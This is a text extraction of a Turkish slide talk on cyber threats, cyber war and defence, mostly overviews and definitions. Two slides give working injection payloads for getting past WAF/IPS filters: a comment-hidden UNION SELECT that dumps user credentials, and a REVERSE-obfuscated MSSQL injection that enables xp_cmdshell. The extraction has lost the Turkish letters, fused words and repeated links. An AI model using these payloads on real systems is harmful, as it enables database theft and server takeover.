Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
-
Upload
anon95143270 -
Category
Documents
-
view
234 -
download
0
Transcript of Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
1/40
Siber Tehditler, Savunma Yntemleri
ve HackerlarnBaarsHuzeyfe NAL
Bilgi Gvenlii AKADEMS
mailto:[email protected]://www.bga.com.tr/http://www.bga.com.tr/mailto:[email protected] -
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
2/40
Konumac Hakknda |Huzeyfe NAL
Bilgi Gvenlii Danman (i hayat)
Bilgi Gvenlii AKADEMS(www.bga.com.tr)
A Gvenlii Aratrmacs (gerek hayat)
Blogger www.lifeoverip.net
2Bilgi Gvenlii AKADEMS | www.bga.com.tr
http://www.bga.com.tr/http://www.lifeoverip.net/http://www.lifeoverip.net/http://www.bga.com.tr/ -
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
3/40
Genel Terim ve Kavramlar
Siber sava(cyber warfare), siber tehditler, sibersu(cyber crime), cyber espionage, cyberintelligence, siber sabotaj(cyber sabotage), siber
terrizm (Cyberterrorism), siber casusluk (Cyber
spying), siber silah (cyber o weapon), szmatestleri (penetration test), siber
gvenlikyarmalar(CTF -Capture The Flag)
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
4/40
Teknolojinin Yaam Dngs
TeknolojiyiAratr
TeknolojiyiAl
Teknolojiyiren
TeknolojiyiKullan
GvenliiniSala
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
5/40
Obamadan nciler...
So cyberspace is real. And so are the risks that comewith it.
In short, America's economic prosperity in the 21stcentury will depend on cybersecurity.
it's now clear this cyber threat is one of the most
serious economic and national security challenges weface as a nation.
And finally, we will begin a national campaign topromote cybersecurity awareness
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
6/40
Siber Hayat
Siber tanm: Altyaps biliim sistemleri olan ve gerek
hayatn glgesi niteliindeki yaam.
Alveri, oyun, film, mzik, ticaret, yemek, komuluk,istihbar bilgi toplama vs gibi gerek hayatn vazgeilmez
ileri siber hayatta da benzeri isimlerle yer almaktadr. Halk iinde sanal dnya olarak da bilinir.
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
7/40
Siber Gvenlik
Siber hayatn gvenlii(gizlilik, btnlk ve eriilebilirlik)
salanmas amacyla gerekletirilen faaliyetlerin tm.
Bilgi gvenliinden fark: daha soyut ve geni bir alankapsamas
Bilgi gvenlii teknik, siber gvenlik sosyal bir tanmdr. ~2015li yllarda en sk kullanlacak tanmlardan.
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
8/40
er ven ere nyay nasEtkiler?
Wikileaks...
Ortadouda devlet bakanlarnn son durumu
Trkiyede kaset mevzular
Siber dnyann salad snrsz zgrlk(?) sayesindekiilerin zel yaam kavram kalmayacaktr
22 Austosda Trkiye internetindegerekletirilecek kstlamalar
Artk tm internet kullanclar belirli profil seerek internetebalanacak ve izlenebilecek!
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
9/40
Gncel Durum
Siber hayat kavramnn yerlemesi.
Siber gvenlik, siber sava, siber ordu tanmlarnnkonuulmaya balanmas.
Yerli gvenlik yazlmlarnn gelitirilmeye
balanmas(yerli retim %0,1 seviyelerinde) Temel eksiklik: bilgi gvenlii farkndal, teknik
konularda alanlarn temel bilgi eksiklii.
Siber gvenliin lks deil, gereksinim olduufikrinin yaygnlamas.
Siber Gvenlik Dernei kurulumu.(2011)
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
10/40
Siber Tehditler
Bilgi gvenliini ihlal edecek tm faaliyetler
DDoS saldrlar: internet zerinden sistemlerineriilebilir olmasn engelleme
Hacking aktiviteleri
Bilgi szdrma faaliyetleri RSA
Sony PS a yelerinin bilgilerinin szmas
Prestij zarar verme faaliyetleri
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
11/40
Siber Sava
Biliim sistemleri kullanlarakgerekletirilen ve amac bir irkete, bir
lkeye veya bir gruba ynelik maddi, manevi zararlar verme olanfaaliyetler.
2007 Estonya rnei: DDoS saldrlaryla lkenin internet sisteminin ilemez hale getirilmesi
2010 Trkiye rnei: Yotube yasan protesto eden bir grup Hacker
eitli bakanlk sitelerine ynelik DDoS saldrlar gerekletirdi.
2011 Trkiye rnei: Anonymous grubunun 22 Austosu protesto eden saldrlar
Etkilenen kurumlar?
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
12/40
Siber Sava Taraflar
Hacker gruplar
Ticari markalar, ticari firmalar
Devletler
Muhalif gruplar
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
13/40
Siber Ordu
lkeyi, kurumu siber dnyadan gelebilecek
tehlikelere kar koruyacak ve gerektiinde sibersaldrlar gerekletirebilecek yetenekteki bilgigvenlii uzmanlarnn
Siber ordu mensubu tm askerler hem saldr hemde koruma yntemlerini ok iyi bilmekzorundadrlar .
ki tr siber ordu bulunmaktadr: Devlet eliyle yetitirilen resmi birimler
Gnll fakat resmi aya olmayan birimler
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
14/40
Dnyadaki Siber Ordular
lk siber ordu Amerika Birleik Devletleri tarafndan gizli
olarak kurulmutur. Bu konuda en nemli yatrmlardan biri K.Koredir. Trkiyede henz bilinen dzenli bir siber ordu yoktur. Baz lkelerde gnll, siber ordular bulunmaktadr. 2010 ylnda birok lke siber ordu konusunu gndemine
almtr.
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
15/40
Cyber spying
eitli hacking yntemleri kullanlarak hedefirket/kurum/devletten bilgi szdrmak
zellikle istihbarat tekilatlarnn sk bavurduuyntemlerden biridir.
stihbarat tekilatlar gvenlik sistemlerineyakalanmayacak malware, virs gelitirme konusundaciddi yatrmlar gerekletirmektedir.
Bunun en iyi rnei randa yaanan Stuxnet ad verilenve dorudan SCADA sistemlere ynelik aksiyon alanktcl yazlmdr.
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
16/40
Cyber weapon
Klasik dnyadaki silah kavramndan farkl olaraksiber silah sadece yoketme amac tamamaktadr.Yeri geldiinde yoketme, yeri geldiinde iz silme veyeri geldiinde hedef sistemlerden bilgi karma
amal kullanlacak yntem ve aralardr. Stuxnet en gncel ve ideal siber silah rneidir.
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
17/40
Siber Casus
Siber casuslar siber ordu elemanlardr
En az 3 yl sren zel eitimlerden geirilerek bilgigvenliine ait tm konular bilen ve 3 konuda ileri seviyeuzman olan kiilere verilen lakaptr.
Bu kiilerin grevleri biliim sistemlerini kullanarak bilgiszdrmaktr.
Grevleri genellikle teknoloji irketlerinde bilgisayarlailgili herhangi bir alandr
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
18/40
lkelerin siber gvenlik stratejileri
Siber gvenlik konusunda alnacak stratehjiler
dorudan o lkenin gelimiliiyle alakaldr Siber gvenlik demek teknolojiden daha fazla
faydalanlyor demek ve daha fazla korunma ihtiyacduyuluyor demektir.
2008-2011 yllar arasnda ou gelimi lke sibergvenlik stratejilerini aklam ve yrrlekoymutur.
Trkiyede henz kabul edilen bir siber gvenlikstratejisi yoktur
Krmz kitaba eklenen satr hari
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
19/40
lkelerin siber gvenlik stratejileri
Canada Cyber Security Strategy
http://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-
eng.pdf
ESTONIA Cyber Security Strategy
http://www.mod.gov.ee/files/kmin/img/files/Kuberjulg
eoleku_strateegia_2008-2013_ENG.pdf
Cyber Security Strategy for Germany
http://www.bmi.bund.de/SharedDocs/Downloads/DE/Themen/OED_Verwaltung/Informationsgesellschaft/cy
ber_eng.pdf?__blob=publicationFile
http://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdf -
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
20/40
lkelerin siber gvenlik stratejileri
Cyber Security Strategy of the United Kingdom
http://www.computerweekly.com/blogs/read-all-
about-
it/Cabinet%20Office%20Cybersecurity%20review%2009
.pdf Australian Government Cyber SeCurity Strategy
http://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/
(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-
+for+website.pdf/$file/AG+Cyber+Security+Strategy+-
+for+website.pdf
http://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdf -
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
21/40
Penetration test
Sistemlerin gvenliini test ettirmek amacylagerekletirilen ve hackerlarn kullandklaryntemleri kullanan beyaz apkallarn gzylesistem aklklarnn aranmas
Whitebox pentest
Blackbox pentest
Olmak zere temelde ikiye ayrlr. Ciddi teknik altyapgerektiren bir prosestir.
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
22/40
CTF -Capture The Flag
Bilgi gvenlii uzmanlarnn offensive securitykonular hakknda bilgi sahibi olmalar ve pratikyapmalar iin gelitirilmi bir oyun trdr.
Genellikle red team(saldrgan) ve blue team olmak
zere ikiye ayrlrlar
Red team hedefleri ele geirmeye, blue team dehedefleri savunmaya ynelik abalar.
Ve oyun boyunca her iki taraf da pratik olarak
bilgilerini kullanma ve test etme ans yakam olur.
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
23/40
II. Blm
Bilgi Gvenlii AKADEMS | www.bga.com.tr 23
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
24/40
Klasik Gvenlik Anlay
Tmden savunma!
rn temelli bir gvenlik anlay
rn= sihirbaz bak as(bilgi-sayar)
Trkiyeye zel deil tm dnya iin geerli
Teknik sorunlar teknik yollarla zlr, insanisorunlar insanla zlr
Temel bilgi sahibi olmadan ileri seviye ileryapmaya alma
TCP/IP bilmeden Firewall/IPS ynetmek
24Bilgi Gvenlii AKADEMS | www.bga.com.tr
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
25/40
Uygulama Gvenlii Nedir?
Yazlm gelitiriciler en ksa srede ortaya rn karma peindeler.
Guvenlik uzmanlar younlukla altyap gvenliine ynelmilerdir
Uygulama Gvenlii: retilen yazlmn fonksiyonlarn yitirmedengvenli bir ekilde gelitirilmesini salama.
UygulamaGvenlii
Yazlm Gelitirme IT Gvenlik
25
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
26/40
Hacking Stage 6Wikipedia, Feb 9 2007
Neden Uygulama Gvenlii
26Bilgi Gvenlii AKADEMS |www.bga.com.tr
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
27/40
Neden Uygulama Gvenlii, devam
27Bilgi Gvenlii AKADEMS | www.bga.com.tr
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
28/40
Gvenlik Dnyasnn Gidiat
Firewall IDS/IPS WAF
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
29/40
Hackerlarin Gidiat
ClientinSecurity
MobileinSecurity
SocialNetworks/Eng.
/
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
30/40
Hacker / gvenlik uzman
Gvenlik uzmanlar prosedrel hareket ettii iin
hackerlara gre bir adm geriden gelir.
Gvenlik uzmanlar iin koruma bir meslek, hackerlariin bu korumalar amak bir zevktir.
Hacker iin bilgi gvenlii diye bir kavram yoktur,sadece almas gereken engel vardr!
Hackerlarn mesaisi, says ve motivasyonu farkldr...
Siber dnyada gece gndz kavramlar yoktur 7/24 mesai yaparlar!
rnek: Wordpress akl
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
31/40
Bak As
l k l
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
32/40
SMS ile kaos oluturma!
d
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
33/40
HTTPS zerinden Free Internet
Baz durumlarda HTTPS portu zerinde hi eriim
kontrol olmayabilir
l l l
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
34/40
SQL Yorumlar ile IPS Atlatma
/* comment */ yorum satr olarak alglanr(SQL
+WAF+IPS tarafndan)
/*!sql-code*/ ve /*!12345sql-code*/ yorum olarak
alglanmaz(SQL tarafndan)(WAF+IPSlertarafndan
yorum olarak alglanr)
/?id=1/*!limit+0+union+select+concat_ws(0x3a,us
ername,password,email)+from+users*/
34Bilgi Gvenlii AKADEMS | www.bga.com.tr
di K ll k I S A l
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
35/40
Encoding Kullanarak IPS Atlatma
Inline alan WAF/IPSlerdeie yarar
35Bilgi Gvenlii AKADEMS | www.bga.com.tr
k i il l
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
36/40
SQL Reverse Fonksiyonu ile IPS Atlatma
SQL Sunucularda bulunan reverse fonksiyonu kullanlr Reverse(lqs) = sql
var=1';DECLARE @a varchar(200) DECLARE @bvarchar(200) DECLARE @c varchar(200) SET @a =REVERSE ('1 ,"snoitpo decnavda wohs"
erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURESET @b = REVERSE ('1,"llehsdmc_px"erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURESET @c =REVERSE('08.911.39.19 gnip" llehsdmc_px')EXEC (@c);--
REVERSE('08.911.39.19 gnip" llehsdmc_px')= ping91.93.119.80
36Bilgi Gvenlii AKADEMS | www.bga.com.tr
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
37/40
N S A V Bil i G lii T l l
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
38/40
NetSec A Ve Bilgi Gvenlii Topluluu
Trkiyenin en geni katlml bilgi gvenlii e-posta
listesi ve topluluu
~1200 ye
cretsiz ye olabilirsiniz.
Gvenlik dnyasnda yaynlanan nemli haberler,gvenlik yamalar ve birok teknik konudatartma...
yelik iin
http://www.lifeoverip.net/netsec-listesi/
38Bilgi Gvenlii AKADEMS | www.bga.com.tr
S l ?
http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/ -
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
39/40
Sorular?
39Bilgi Gvenlii AKADEMS | www.bga.com.tr
Bil i G lii AKADEMS
-
7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri
40/40
Bilgi Gvenlii AKADEMS
40